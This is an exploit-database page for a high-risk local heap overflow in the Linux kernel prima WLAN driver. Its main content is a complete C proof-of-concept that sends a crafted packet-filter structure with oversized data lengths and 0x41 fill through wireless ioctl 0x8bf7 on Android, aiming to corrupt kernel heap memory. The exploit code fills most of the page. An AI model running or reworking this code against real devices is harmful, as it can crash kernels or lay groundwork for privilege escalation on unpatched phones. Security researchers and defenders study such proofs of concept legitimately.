Linux Kernel prima WLAN Driver Heap Overflow

2016.01.27
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-119

/* * Coder: Shawn the R0ck, [citypw@gmail.com] * Co-worker: Pray3r, [pray3r.z@gmail.com] * Compile: * # arm-linux-androideabi-gcc wext_poc.c --sysroot=$SYS_ROOT -pie * # ./a.out wlan0 * Boom......shit happens[ as always];-) */ #include <stdio.h> #include <string.h> #include <stdlib.h> #include <sys/ioctl.h> #include <sys/types.h> #include <sys/socket.h> #include <linux/wireless.h> #include <errno.h> typedef unsigned char v_U8_t; #define HDD_MAX_CMP_PER_PACKET_FILTER 5 struct PacketFilterParamsCfg { v_U8_t protocolLayer; v_U8_t cmpFlag; v_U8_t dataOffset; v_U8_t dataLength; v_U8_t compareData[8]; v_U8_t dataMask[8]; }; typedef struct { v_U8_t filterAction; v_U8_t filterId; v_U8_t numParams; struct PacketFilterParamsCfg paramsData[HDD_MAX_CMP_PER_PACKET_FILTER]; } tPacketFilterCfg, *tpPacketFilterCfg; int main(int argc, const char *argv[]) { if (argc != 2) { fprintf(stderr, "Bad usage\n"); fprintf(stderr, "Usage: %s ifname\n", argv[0]); return -1; } struct iwreq req; strcpy(req.ifr_ifrn.ifrn_name, argv[1]); int fd, status, i = 0; fd = socket(AF_INET, SOCK_DGRAM, 0); tPacketFilterCfg p_req; /* crafting a data structure to triggering the code path */ req.u.data.pointer = malloc(sizeof(v_U8_t) * 3 + sizeof(struct PacketFilterParamsCfg) * 5); p_req.filterAction = 1; p_req.filterId = 0; p_req.numParams = 3; for (; i < 5; i++) { p_req.paramsData[i].dataLength = 241; memset(&p_req.paramsData[i].compareData, 0x41, 16); } memcpy(req.u.data.pointer, &p_req, sizeof(v_U8_t) * 3 + sizeof(struct PacketFilterParamsCfg) * 5); if (ioctl(fd, 0x8bf7, &req) == -1) { fprintf(stderr, "Failed ioct() get on interface %s: %s\n", argv[1], strerror(errno)); } else { printf("You shouldn't see this msg...\n"); } }


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top